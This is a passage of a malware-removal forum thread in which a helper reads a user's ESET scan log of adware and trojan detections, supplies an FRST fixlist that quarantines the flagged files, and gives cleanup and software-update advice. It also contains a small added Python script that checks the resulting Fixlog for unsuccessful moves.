# utc_time=2015-04-16 06:04:30
# local_time=2015-04-16 01:04:30 (-0600, Central Daylight Time)
# country="United States"
# lang=1033
# osver=6.0.6002 NT Service Pack 2
# compatibility_mode_1='Microsoft Security Essentials'
# compatibility_mode=5895 16777213 100 100 4625710 52036664 0 0
# scanned=193600
# found=26
# cleaned=0
# scan_time=3951
sh=29720E7A15CE7DF0A30D938E133FEDF2B259EF5B ft=1 fh=878238167f8758f6 vn="Win32/BrowseFox.N potentially unwanted application" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\Krab Web\bin\6eaeb8afe4d94df5b9d7.dll.vir"
sh=C1B5E924562930AB658499B8F5591C747AEA1933 ft=1 fh=453726dd1a07cb0b vn="Win64/BrowseFox.C potentially unwanted application" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\Krab Web\bin\6eaeb8afe4d94df5b9d764.dll.vir"
sh=A7A00EA25E5F172BFE727E9F360A234363FC3E3B ft=1 fh=793167af05290924 vn="a variant of Win32/BrowseFox.P potentially unwanted application" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\Krab Web\bin\KrabWeb.BrowserAdapter.exe.vir"
sh=FB0C95AF84C771C1D8B7F395BD85B692B642C697 ft=1 fh=b185f36530b39741 vn="Win64/BrowseFox.B potentially unwanted application" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\Krab Web\bin\KrabWeb.BrowserAdapter64.exe.vir"
sh=CAB08ED851D46001657C62AF82BD33176CE801F2 ft=1 fh=12b308dacf2d4901 vn="a variant of MSIL/BrowseFox.H potentially unwanted application" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\Krab Web\bin\utilKrabWeb.exe.vir"
sh=2D329A7C0B99AA9A44078ABE1F0B6EF5F4252EFD ft=1 fh=e050f3f402504430 vn="a variant of Win32/BrowseFox.M potentially unwanted application" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\Krab Web\bin\{6eaeb8af-e4d9-4df5-b9d7-815f2928cdf7}.dll.vir"
sh=100C66B9D88006C7B0F9A3AFD7CBCA1F1D39714F ft=1 fh=cffbbcb143a4c7fb vn="Win64/BrowseFox.D potentially unwanted application" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\Krab Web\bin\{6eaeb8af-e4d9-4df5-b9d7-815f2928cdf7}64.dll.vir"
sh=72AA09658B436C44278385E9FCDEC1BB877435F6 ft=1 fh=e7dbf0fed70925c0 vn="a variant of Win32/ReImageRepair.D potentially unwanted application" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\Reimage\Reimage Repair\Reimage.exe.vir"
sh=45E7449F1A82158B429BE44611AE49BCEFDAB6E1 ft=1 fh=dffb77abfb1a8bfc vn="Win32/ReImageRepair.F potentially unwanted application" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\Reimage\Reimage Repair\ReimageRepair.exe.vir"
sh=01D253F0ECFA187BBDFD2707D458CC80494C3BA4 ft=1 fh=0192370b324df6e9 vn="Win32/Toolbar.BitCocktail.C potentially unwanted application" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\Shop For Rewards\jvwn.dll.vir"
sh=1A013B290CD05590B18E77F40DD67E8C530019EA ft=1 fh=9bf57077d1ee696f vn="a variant of MSIL/Adware.PullUpdate.H application" ac=I fn="C:\AdwCleaner\Quarantine\C\ProgramData\Browser\prompt.exe.vir"
sh=0D0E4E754838A74CDF95A909136287A8CEE3A91D ft=0 fh=0000000000000000 vn="Win32/Adware.MultiPlug.EK application" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\aoiuyau@vbgdka.edu\content\bg.js.vir"
sh=91A146EAC115BD69B6678A539FB623F6A7C33B7A ft=0 fh=0000000000000000 vn="JS/Kryptik.ATB trojan" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\yeeyiye@bffm.org\content\bg.js.vir"
sh=AD3EB5C38E33919317F46331E93E669105497F07 ft=1 fh=f28f6a642fe78f79 vn="a variant of Win32/Conduit.SearchProtect.N potentially unwanted application" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\{7b13ec3e-999a-4b70-b9cb-2617b8323822}\ctypes\FirefoxCtype.dll.vir"
sh=545537DD6DF32D4ADCA7CD093735EB727CF3B98E ft=1 fh=c14d1e35487b28c7 vn="a variant of Win32/Conduit.SearchProtect.N potentially unwanted application" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\{7b13ec3e-999a-4b70-b9cb-2617b8323822}\Plugins\npFirefoxPlugin.dll.vir"
sh=45E7449F1A82158B429BE44611AE49BCEFDAB6E1 ft=1 fh=dffb77abfb1a8bfc vn="Win32/ReImageRepair.F potentially unwanted application" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\Angel\Documents\ReimageRepair.exe.vir"
sh=B2656757D4A5A37376EFD5F5929EEC0DFF21D317 ft=1 fh=d782dbdccb214522 vn="a variant of Win32/NetFilter.A potentially unsafe application" ac=I fn="C:\AdwCleaner\Quarantine\C\Windows\system32\drivers\netfilter.sys.vir"
sh=D158E372F3ACE0D674E7BD1273C59973065F4851 ft=1 fh=c71c00119649f099 vn="a variant of Win32/Adware.Salus.A application" ac=I fn="C:\FRST\Quarantine\C\Program Files\Smgy0ntk1mjjizdb\mgi0nzk4mjziyjb.exe"
sh=7C93024A49DDCCD047B4BD1CE1166BA28DC027BA ft=1 fh=fb61a40f94e47156 vn="a variant of Win32/Adware.Salus.B application" ac=I fn="C:\FRST\Quarantine\C\Program Files\Smgy0ntk1mjjizdb\uninstall.exe"
sh=1AE9177D993D85533746A93CCD00C3FE1C3C527D ft=0 fh=0000000000000000 vn="JS/Kryptik.ATB trojan" ac=I fn="C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\extensions\staged\oe6w6h@xqxq-a.org\content\bg.js"
sh=8E50F8086353595072BFD9F8BFBBD8880445510A ft=0 fh=0000000000000000 vn="JS/Kryptik.ATL trojan" ac=I fn="C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\extensions\staged\w3hek_hpdw@vpqv-.edu\content\bg.js"
sh=AD3EB5C38E33919317F46331E93E669105497F07 ft=1 fh=f28f6a642fe78f79 vn="a variant of Win32/Conduit.SearchProtect.N potentially unwanted application" ac=I fn="C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\extensions\{7b13ec3e-999a-4b70-b9cb-2617b8323822}\ctypes\FirefoxCtype.dll"
sh=545537DD6DF32D4ADCA7CD093735EB727CF3B98E ft=1 fh=c14d1e35487b28c7 vn="a variant of Win32/Conduit.SearchProtect.N potentially unwanted application" ac=I fn="C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\extensions\{7b13ec3e-999a-4b70-b9cb-2617b8323822}\Plugins\npFirefoxPlugin.dll"
sh=D554FB8FC5575CE755DE54D99B43B9FE4D0C711D ft=1 fh=0140ebeac6bfedb8 vn="a variant of Win32/InstallCore.PK potentially unwanted application" ac=I fn="C:\Users\Angel\Downloads\Adobe_Reader_Setup.exe"
sh=DBD6CD321F98F235991B05130B93DDBFE74AAEFD ft=1 fh=3a9dd407a9c5067b vn="Win32/Bundled.Toolbar.Google.D potentially unsafe application" ac=I fn="C:\Users\Angel\Downloads\ccsetup504pro.exe"
sh=34C968D19DFB7D6D103B2D15C9BA7E6333C74F24 ft=0 fh=0000000000000000 vn="a variant of MSIL/Toolbar.Linkury.G potentially unwanted application" ac=I fn="C:\Windows\Installer\79400.msi"
 
And so far, so good. No pop ups or hijacks to report.


#8 deeprybka

  • Malware Response Team

Posted 16 April 2015 - 12:23 PM

Hi there,

Step 1


Press the Windows key + R on your keyboard at the same time. Type notepad and click OK.

  • Copy the entire content of the codebox below and paste into the notepad document:
    C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\extensions\staged\oe6w6h@xqxq-a.org\content\bg.js
    C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\extensions\staged\w3hek_hpdw@vpqv-.edu\content\bg.js
    C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\extensions\{7b13ec3e-999a-4b70-b9cb-2617b8323822}
    C:\Windows\Installer\79400.msi
    
  • Click File, Save As and type fixlist.txt as the File Name.

Both files, FRST and fixlist.txt have to be in the same location or the fix will not work!

  • Right-click on the FRST icon and select Run as Administrator to start the tool.
    (XP users click run after receipt of Windows Security Warning - Open File).
  • Press the Fix button just once and wait.
  • If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
  • When finished FRST will generate a log on the Desktop, called Fixlog.txt.

Please post it in your reply.

That's it!
Your logs look clean to me at the moment.
We're gonna clean up everything now, close security holes on your computer and in the end I'll provide you with a list of security tips so you hopefully will not need our help anymore in the future.




Clean Up

Now we remove all the tools we used (including their logs and quarantine folders), restore your settings and delete old and infected system restore points:

  • You can uninstall programs that you had to install (e.g. MBAM or ESET Onlinescanner) in the control panel if you so wish.
  • Download DelFix (by Xplode) and save it to your Desktop.
    • Close all running programs and start delfix.exe.
    • Make sure that all available options are checked.
    • Click on Run
    • DelFix should remove all our tools and delete itself afterwards. I don't need the log file.
  • If there is still something left you can delete it manually.

Closing security holes

Many infections happen via drive-by downloads that run unnoticed in the background while the user visits an infected website. To achieve this, malware exploits security holes in installed software (e.g. browser or its plugins). Older versions of such software often have lots of known exploitable holes. Therefore it's very important to always keep your software up-to-date.
The following software is outdated. Make sure you remove all old versions and install the current one instead if you need the program:



Adobe Flash Player 16 ActiveX
Adobe Flash Player 16 NPAPI
Adobe Reader X (10.1.13)
Java 7 Update 55
Java™ 6 Update 7


Tips

I recommend reading and following "16 simple and easy ways to keep your computer safe and secure on the Internet" by Lawrence Abrams.


regards,
deeprybka
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer

#9 SereneSnake

  • Topic Starter

Posted 17 April 2015 - 05:19 PM

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version: 15-04-2015 04
Ran by Angel at 2015-04-17 17:17:50 Run:2
Running from C:\Users\Angel\Desktop
Loaded Profiles: Angel (Available profiles: Angel)
Boot Mode: Normal
 
==============================================
 
Content of fixlist:
*****************
C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\extensions\staged\oe6w6h@xqxq-a.org\content\bg.js
C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\extensions\staged\w3hek_hpdw@vpqv-.edu\content\bg.js
C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\extensions\{7b13ec3e-999a-4b70-b9cb-2617b8323822}
C:\Windows\Installer\79400.msi
*****************
 
C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\extensions\staged\oe6w6h@xqxq-a.org\content\bg.js => Moved successfully.
C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\extensions\staged\w3hek_hpdw@vpqv-.edu\content\bg.js => Moved successfully.
C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\extensions\{7b13ec3e-999a-4b70-b9cb-2617b8323822} => Moved successfully.
C:\Windows\Installer\79400.msi => Moved successfully.
 
==== End of Fixlog 17:17:50 ====
 
Thank You SOOO much for your help! My sister and I appreciate it!
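
A check one could run over a Fixlog like the one posted above, as an added example (not part of the original post and not FRST's own code): it confirms that every fixlist entry has a result line reading "Moved successfully.", the only status shown in this thread. The sample log, its paths and the function names are constructed for illustration.

```python
import re

SUCCESS = "Moved successfully."  # the only status string seen in the thread's Fixlog

def parse_fixlog(text):
    """Return (fixlist_entries, results) parsed from the text of a Fixlog.txt."""
    entries, results = [], {}
    seen_header = in_fixlist = False
    for ln in (raw.strip() for raw in text.splitlines()):
        if ln.startswith("Content of fixlist:"):
            seen_header = True
        elif seen_header and re.fullmatch(r"\*{5,}", ln):
            # first star line opens the fixlist block, the second closes it
            in_fixlist = not in_fixlist
            seen_header = in_fixlist
        elif in_fixlist:
            if ln:
                entries.append(ln)
        elif " => " in ln:
            target, status = ln.rsplit(" => ", 1)
            results[target] = status
    return entries, results

def review(text):
    """List fixlist entries lacking a result line or with a non-success status."""
    entries, results = parse_fixlog(text)
    # Windows paths are case-insensitive, so compare on lowercased keys
    by_key = {k.lower(): v for k, v in results.items()}
    findings = []
    for entry in entries:
        status = by_key.get(entry.lower())
        if status is None:
            findings.append((entry, "no result line"))
        elif status != SUCCESS:
            findings.append((entry, status))
    return findings

# Constructed sample: the third entry has no result line on purpose.
SAMPLE = r"""Content of fixlist:
*****************
C:\Example\staged\ext-one\content\bg.js
C:\Example\extensions\{placeholder-guid}
C:\Example\Installer\sample.msi
*****************

C:\Example\staged\ext-one\content\bg.js => Moved successfully.
c:\example\extensions\{placeholder-guid} => Moved successfully.
==== End of Fixlog ====
"""

if __name__ == "__main__":
    for path, reason in review(SAMPLE):
        print(f"needs review: {path} ({reason})")
```

Any status other than the one seen in this thread is reported for manual review rather than interpreted.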


#10 deeprybka

  • Malware Response Team
  • Local time:12:30 PM

Posted 17 April 2015 - 11:54 PM

You are welcome. Take care.


regards,
deeprybka

#11 deeprybka

  • Malware Response Team
  • Local time:12:30 PM

Posted 17 April 2015 - 11:54 PM

It appears that this issue is resolved, therefore I am closing the topic. If that is not the case and you need or wish to continue with this topic, please send me or any Moderator a Personal Message (PM) that you would like this topic re-opened.
regards,
deeprybka



